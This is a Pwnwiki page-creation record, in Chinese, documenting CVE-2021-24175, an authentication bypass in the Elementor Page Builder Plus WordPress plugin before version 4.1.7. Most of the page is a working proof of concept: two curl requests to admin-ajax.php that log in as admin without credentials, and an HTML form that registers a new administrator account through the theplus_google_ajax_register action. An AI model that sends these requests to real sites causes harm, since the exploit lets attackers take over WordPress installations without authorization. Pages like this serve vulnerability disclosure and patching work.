Pwnwiki: Created page with "==影響版本== Elementor Page Builder <4.1.7 ==POC==

 curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.ph..."

2021-05-22T02:00:34Z

Created page with "==影響版本== Elementor Page Builder <4.1.7 ==POC== <pre> curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.ph..."

New page

==影響版本==
Elementor Page Builder <4.1.7

==POC==
<pre>
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php
</pre>

"theplus_google_ajax_register" AJAX請求還可以允許任何未經身份驗證的用戶創建具有任意角色的帳戶，例如admin，然後登錄。

html：
<pre>
<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="test@example.com" name="email" type="text">
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>
</pre>

CVE-2021-24175 WordPress Elementor Page Builder Plus插件身份驗證繞過漏洞 - Revision history

Pwnwiki: Created page with "==影響版本== Elementor Page Builder <4.1.7 ==POC==
curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.ph..."